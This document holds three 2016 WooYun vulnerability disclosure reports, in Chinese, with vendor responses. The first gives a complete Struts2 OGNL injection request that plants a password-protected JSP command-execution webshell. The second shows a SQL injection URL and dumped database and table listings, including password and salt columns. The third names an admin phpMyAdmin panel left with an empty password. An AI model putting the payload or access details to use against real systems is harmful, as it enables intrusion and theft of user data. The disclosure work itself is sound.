漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：不多说了，赶快上车详细说明：这个系统之前就有漏洞 http://**.**.**.**/bugs/wooyun-2016-0170697据说很多敏感数据啊code 区域http://**.**.**.**:8091/logout.action?method:[email protected]/* */@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%**.**.**.**.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%**.**.**.**.InputStream%20in%20%253d%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%253d%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%253d%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%253din.read%28b%29%29%21%253d-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E最新的st2命令执行漏洞证明：借tangscan的工具验证了一下也没问题 修复方案：升级版权声明：转载请注明来源 举起手来@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-04-29 18:33厂商回复：CNVD确认并复现所述情况，已经转由CNCERT发给中国银联，由其后续协调网站管理单位处置。最新状态：暂无

漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-10： 厂商已经主动忽略漏洞，细节向公众公开简要描述：影响14库 50W+用户信息泄露详细说明： code 区域http://m.abab.com/index.php?a=Search&keyWord=会说话的狗狗本code 区域available databases [14]: [*] abab [*] abab_article [*] abab_bbs [*] abab_comment [*] abab_faka [*] abab_kaifu [*] abab_play [*] abab_soft [*] abab_spreader [*] abab_youxi [*] abab_youxi_soft [*] abab_youxiku [*] information_schema [*] test原谅我开服务器跑了两个小时才跑完一个库code 区域Database: abab_bbs [297 tables] +-------------------------------+ | common_admincp_cmenu | | common_admincp_group | | common_admincp_member | | common_admincp_perm | | common_admincp_session | | common_admingroup | | common_adminnote | | common_advertisement | | common_advertisement_custom | | common_banned | | common_block | | common_block_favorite | | common_block_item | | common_block_item_data | | common_block_permission | | common_block_pic | | common_block_style | | common_block_xml | | common_cache | | common_card | | common_card_log | | common_card_type | | common_connect_guest | | common_credit_log | | common_credit_rule | | common_credit_rule_log | | common_credit_rule_log_field | | common_cron | | common_devicetoken | | common_district | | common_diy_data | | common_domain | | common_failedlogin | | common_friendlink | | common_grouppm | | common_invite | | common_magic | | common_magiclog | | common_mailcron | | common_mailqueue | | common_member | | common_member_action_log | | common_member_connect | | common_member_count | | common_member_crime | | common_member_field_forum | | common_member_field_home | | common_member_grouppm | | common_member_log | | common_member_magic | | common_member_medal | | common_member_profile | | common_member_profile_setting | | common_member_security | | common_member_stat_field | | common_member_status | | common_member_validate | | common_member_verify | | common_member_verify_info | | common_myapp | | common_myinvite | | common_mytask | | common_nav | | common_onlinetime | | common_patch | | common_plugin | | common_pluginvar | | common_process | | common_regip | | common_relatedlink | | common_report | | common_searchindex | | common_secquestion | | common_session | | common_setting | | common_smiley | | common_sphinxcounter | | common_stat | | common_statuser | | common_style | | common_stylevar | | common_syscache | | common_tag | | common_tagitem | | common_task | | common_taskvar | | common_template | | common_template_block | | common_template_permission | | common_uin_black | | common_usergroup | | common_usergroup_field | | common_word | | common_word_type | | connect_disktask | | connect_feedlog | | connect_memberbindlog | | connect_postfeedlog | | connect_tthreadlog | | forum_access | | forum_activity | | forum_activityapply | | forum_announcement | | forum_attachment | | forum_attachment_0 | | forum_attachment_1 | | forum_attachment_2 | | forum_attachment_3 | | forum_attachment_4 | | forum_attachment_5 | | forum_attachment_6 | | forum_attachment_7 | | forum_attachment_8 | | forum_attachment_9 | | forum_attachment_exif | | forum_attachment_unused | | forum_attachtype | | forum_baidu_user | | forum_bbcode | | forum_collection | | forum_collectioncomment | | forum_collectionfollow | | forum_collectioninvite | | forum_collectionrelated | | forum_collectionteamworker | | forum_collectionthread | | forum_creditslog | | forum_debate | | forum_debatepost | | forum_faq | | forum_forum | | forum_forum_threadtable | | forum_forumfield | | forum_forumrecommend | | forum_groupcreditslog | | forum_groupfield | | forum_groupinvite | | forum_grouplevel | | forum_groupuser | | forum_imagetype | | forum_medal | | forum_medallog | | forum_memberrecommend | | forum_moderator | | forum_modwork | | forum_onlinelist | | forum_order | | forum_poll | | forum_polloption | | forum_pollvoter | | forum_post | | forum_post_location | | forum_post_moderate | | forum_post_tableid | | forum_postcache | | forum_postcomment | | forum_postlog | | forum_poststick | | forum_promotion | | forum_ratelog | | forum_relatedthread | | forum_replycredit | | forum_rsscache | | forum_spacecache | | forum_statlog | | forum_thread | | forum_thread_moderate | | forum_threadaddviews | | forum_threadtitle | | forum_threadclosed | | forum_threaddisablepos | | forum_threadimage | | forum_threadlog | | forum_threadmod | | forum_threadpartake | | forum_threadpreview | | forum_threadrush | | forum_threadtype | | forum_trade | | forum_tradecomment | | forum_tradelog | | forum_typeoption | | forum_typeoptionvar | | forum_typevar | | forum_warning | | gamepk | | gamepk_cate | | gamepk_comment | | gamepk_config | | gamepk_gold | | gamepk_gold_log | | gamepk_log | | gamepk_seo | | home_album | | home_album_category | | home_appcreditlog | | home_blacklist | | home_blog | | home_blog_category | | home_blog_moderate | | home_blogfield | | home_title | | home_click | | home_clickuser | | home_comment | | home_comment_moderate | | home_docomment | | home_doing | | home_doing_moderate | | home_favorite | | home_feed | | home_feed_app | | home_follow | | home_follow_feed | | home_follow_feed_archiver | | home_friend | | home_friend_request | | home_friendlog | | home_notification | | home_pic | | home_pic_moderate | | home_picfield | | home_poke | | home_pokearchive | | home_share | | home_share_moderate | | home_show | | home_specialuser | | home_userapp | | home_userappfield | | home_visitor | | mobile_setting | | portal_article_content | | portal_article_count | | portal_article_moderate | | portal_article_related | | portal_article_title | | portal_article_trash | | portal_attachment | | portal_category | | portal_category_permission | | portal_comment | | portal_comment_moderate | | portal_rsscache | | portal_topic | | portal_topic_pic | | security_evilpost | | security_eviluser | | security_failedlog | | strayer_article | | strayer_article_content | | strayer_article_title | | strayer_category | | strayer_evo | | strayer_evo_log | | strayer_evolution | | strayer_fastpick | | strayer_member | | strayer_picker | | strayer_rules | | strayer_searchindex | | strayer_setting | | strayer_timing | | strayer_url | | strayer_user | | ucenter_admins | | ucenter_applications | | ucenter_badwords | | ucenter_domains | | ucenter_failedlogins | | ucenter_feeds | | ucenter_friends | | ucenter_mailqueue | | ucenter_memberfields | | ucenter_members | | ucenter_members_copy | | ucenter_mergemembers | | ucenter_newpm | | ucenter_notelist | | ucenter_pm_indexes | | ucenter_pm_lists | | ucenter_pm_members | | ucenter_pm_messages_0 | | ucenter_pm_messages_1 | | ucenter_pm_messages_2 | | ucenter_pm_messages_3 | | ucenter_pm_messages_4 | | ucenter_pm_messages_5 | | ucenter_pm_messages_6 | | ucenter_pm_messages_7 | | ucenter_pm_messages_8 | | ucenter_pm_messages_9 | | ucenter_protectedmembers | | ucenter_settings | | ucenter_sqlcache | | ucenter_tags | | ucenter_vars | +-------------------------------+code 区域Database: abab_bbs Table: ucenter_members [12 columns] +---------------+-----------------------+ | Column | Type | +---------------+-----------------------+ | email | char(32) | | lastloginip | int(10) | | lastlogintime | int(10) unsigned | | myid | char(30) | | myidkey | char(16) | | password | char(32) | | regdate | int(10) unsigned | | regip | char(15) | | salt | char(6) | | secques | char(8) | | uid | mediumint(8) unsigned | | username | char(50) | +---------------+-----------------------+ Database: abab_bbs Table: common_member [22 columns] +--------------------+-----------------------+ | Column | Type | +--------------------+-----------------------+ | eailstatus | | accessmasks | tinyint(1) | | adminid | tinyint(1) | | allowadmincp | tinyint(1) | | avatarstatus | tinyint(1) | | conisbind | tinyint(1) unsigned | | credits | int(10) | | email | char(40) | | extgroupids | char(20) | | groupdxpiry | | groupid | smallint(6) unsigned | | newpm | smallint(6) unsigned | | newprompt | smallint(6) unsigned | | notifysound | tinyint(1) | | onlyacceptfriendpm | tinyint(1) | | password | char(32) | | regdate | int(10) unsigned | | status | tinyint(1) | | timeoffset | char(4) | | uid | mediumint(8) unsigned | | username | char(15) | | videophotostatus | tinyint(1) | +--------------------+-----------------------+还有几个库没跑 估计开了这么多年的游戏网站起码得有百万+用户 还请审核们考证漏洞证明： 修复方案： 版权声明：转载请注明来源 Exploit DB@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-10 15:00厂商回复： 漏洞Rank：15 (WooYun评价)最新状态：暂无

漏洞详情披露状态： 2016-05-13： 细节已通知厂商并且等待厂商处理中2016-05-13： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-05-17： 厂商已经主动忽略漏洞，细节向公众公开简要描述：某日在我浪上冲浪，发现一个有趣的地方~详细说明： code 区域http://admin.pay.sina.com/phpmyadmin/phpMyAdmin后台弱口令，也是够弱的...code 区域账号:admin 密码为空漏洞证明：部分用户数据可惜权限较低，无法进一步验证 ：(修复方案：修改掉这个炒鸡弱的口令吧 ：）版权声明：转载请注明来源 Mel0d6y@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-05-17 16:47厂商回复：已有白帽子报告了，感谢关注新浪安全。最新状态：暂无